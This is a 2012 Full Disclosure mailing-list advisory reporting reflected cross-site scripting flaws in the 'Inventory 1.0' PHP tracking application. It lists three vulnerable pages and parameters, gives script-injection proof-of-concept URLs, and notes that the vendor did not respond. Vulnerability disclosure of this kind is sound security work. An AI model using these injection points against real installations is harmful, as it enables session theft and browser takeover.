Full Disclosure mailing list archives

Inventory 1.0 Multiple XSS Vulnerabilities

From: Thomas Richards <g13net () gmail com>
Date: Fri, 26 Oct 2012 09:28:32 -0400

# Exploit Title: Inventory 1.0 Multiple XSS Vulnerabilities
# Date: 10/19/12
# Author: G13
# Twitter: @g13net
# Software Site: https://github.com/farevalod/inventory
# Version: 1.0
# Category: webapp (php)
# dc585

##### ToC #####

0x01 Description
0x02 XSS
0x03 Vendor Notification

##### 0x01 Description #####

PHP + SQL Inventory tracking system

##### 0x02 XSS #####

The Inventory application has multiple pages and parameters that are
vulnerable to cross-site scripting.  This
vulnerabilities could be used to steal session cookies or take control
of a client's browser.

-----Vulnerable Pages-----
http://localhost/inventory/consulta_fact.php?fact_num=[XSS]
http://localhost/inventory/newinventario.php?sn=[XSS]
http://localhost/inventory/newtransact.php?ref=[XSS]

-----PoC Exploit-----
http://localhost/inventory/consulta_fact.php?fact_num=<script>alert(1)</script>
http://localhost/inventory/newinventario.php?sn=<script>alert(100)</script>
http://localhost/inventory/newtransact.php?ref=<script>alert(100)</script>

##### 0x03 Vendor Notification #####

10/19/12 - Vendor Notified
10/26/12 - No response, disclosure

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Current thread:

Inventory 1.0 Multiple XSS Vulnerabilities Thomas Richards (Oct 26)